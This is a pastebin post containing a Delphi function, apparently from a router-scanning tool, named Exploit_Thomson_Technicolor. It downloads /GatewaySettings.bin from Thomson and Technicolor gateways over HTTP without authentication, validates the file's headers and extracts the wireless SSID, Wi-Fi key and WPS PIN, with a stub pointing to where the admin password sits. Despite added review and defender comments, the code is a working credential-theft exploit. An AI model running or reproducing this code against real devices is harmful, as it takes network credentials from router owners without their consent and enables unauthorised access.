
Untitled

a guest
May 16th, 2016
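  // References:
  // http://www.securiteam.com/securitynews/5XP380ADFA.html
  //
  // Fetches /GatewaySettings.bin from the device over HTTP and, when the file
  // passes two header checks, copies the SSID, wireless key and PIN out of the
  // '8021' settings block into the result table.
  //
  // Parameters:
  //   UseAuth            - not referenced in the visible body.
  //   AuthUser, AuthPass - passed through to GetHTTPStream (declared var, so
  //                        the helper may update them - TODO confirm).
  // Returns:
  //   Result is never set to True in the visible code; findings are reported
  //   only through SetTableCell.
  //
  // Defender note: the fields are read from the backup as plain
  // NUL-terminated strings, so any client that can download this file learns
  // the wireless credentials. Access to this path should require an
  // authenticated session and the management interface should not be reachable
  // from untrusted networks; requests for /GatewaySettings.bin from hosts that
  // are not management stations are worth alerting on.
  function TRouter.Exploit_Thomson_Technicolor(UseAuth: Boolean; var AuthUser, AuthPass: String): Boolean;
  var
    Code: Integer;
    MS: TMemoryStream;
    dw, off: DWord;
    w: Word;
    Found: Boolean;

    // Walks the block list from the current stream position. Each block starts
    // with a big-endian 2-byte size (header included) and a 4-byte tag.
    // On a match the stream is left at the start of the block, Off holds that
    // position and Sz the block size. Returns True only when the tag matches
    // and the whole block lies inside the stream.
    function SearchBlock(Src: TMemoryStream; Name: AnsiString; var Off: DWord;
      var Sz: Word): Boolean;
    var
      Raw: Word;
      Tag: Array[0..3] of AnsiChar;
    begin
      Result := False;
      // Require a complete 6-byte header; a truncated tail would otherwise
      // make ReadBuffer raise in the middle of the scan.
      while Src.Position + 6 <= Src.Size do begin
        Off := Src.Position;
        Src.ReadBuffer(Raw, 2);
        Sz := SwapEndian(Raw);
        Src.ReadBuffer(Tag[0], 4);
        Src.Seek(-6, soCurrent);
        // A size smaller than the header cannot advance past this block
        // (size 0 would loop forever), so treat the file as malformed.
        if Sz < 6 then
          Exit;
        if Tag = Name then begin
          // The size field comes from the remote file: only report the block
          // when it really fits in the downloaded data.
          Result := Int64(Off) + Sz <= Src.Size;
          Exit;
        end;
        Src.Seek(Sz, soCurrent);
      end;
    end;

    // Copies the NUL-terminated string that starts at Start, never reading at
    // or beyond Limit (both are offsets into Src's buffer).
    function FieldStr(Src: TMemoryStream; Start, Limit: DWord): AnsiString;
    var
      P: PAnsiChar;
      Len: DWord;
    begin
      // Pointer arithmetic on PAnsiChar avoids casting the buffer address to
      // a 32-bit Cardinal, which truncates it on 64-bit targets.
      P := PAnsiChar(Src.Memory) + Start;
      Len := 0;
      while (Start + Len < Limit) and (P[Len] <> #0) do
        Inc(Len);
      SetString(Result, P, Len);
    end;

  begin
    // Affected:
    // Technicolor (many)
    // Thomson (many)
    Result := False;
    if ServerName <> '' then
      Exit;
    if AuthOk and (AuthUser = 'admin') then
      Exit;
    MS := TMemoryStream.Create;
    try
      if GetHTTPStream('http://'+IPToStr(IP)+':'+IntToStr(Port)+'/GatewaySettings.bin',
        MS, Code, 5, 0, ServerName, False, AuthUser, AuthPass) then
        if MS.Size > 256 then begin
          // Header check 1: big-endian dword at $5A must be $10000
          // (presumably a format/version marker - TODO confirm).
          MS.Seek($5A, soFromBeginning);
          MS.ReadBuffer(dw, 4);
          dw := SwapEndian(dw);
          if dw = $10000 then begin
            // Header check 2: big-endian word at $5E must equal the file size
            // minus $10. The stream is left at $60, where the block scan starts.
            MS.Seek($5E, soFromBeginning);
            MS.ReadBuffer(w, 2);
            w := SwapEndian(w);
            if w = MS.Size - $10 then begin
              Found := SearchBlock(MS, '8021', off, w);
              if Found and (w >= $22E) then begin
                // off + w is inside the stream (checked by SearchBlock), so
                // each copy is bounded by the end of the block.
                SSID := FieldStr(MS, off + 8, off + w);
                SetTableCell(stcSSID, SSID);
                Pasw := FieldStr(MS, off + $174, off + w);
                SetTableCell(stcKey, Pasw);
                Pin := FieldStr(MS, off + $225, off + w);
                SetTableCell(stcPin, Pin);
              end;
              {Found := SearchBlock(MS, 'WiGu', off, w);
              if Found and (w >= $C1) then begin
                LAN := IntToStr(PByte(Cardinal(MS.Memory) + off + $B9)^)+
                  '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BA)^)+
                  '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BB)^)+
                  '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BC)^);
                SetTableCell(stcLANIP, LAN);
                LAN := IntToStr(PByte(Cardinal(MS.Memory) + off + $BD)^)+
                  '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BE)^)+
                  '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BF)^)+
                  '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $C0)^);
                SetTableCell(stcLANMask, LAN);
              end;}
              // NOTE(review): this scan resumes from wherever the previous
              // SearchBlock call left the stream; it does not rewind to $60.
              Found := SearchBlock(MS, 'UPC.', off, w);
              if Found and (w >= $C1) then begin
                // admin password somewhere here
              end;
            end;
          end;
        end;
    finally
      // Release the buffer even if a stream read or the HTTP helper raises.
      MS.Free;
    end;
  end;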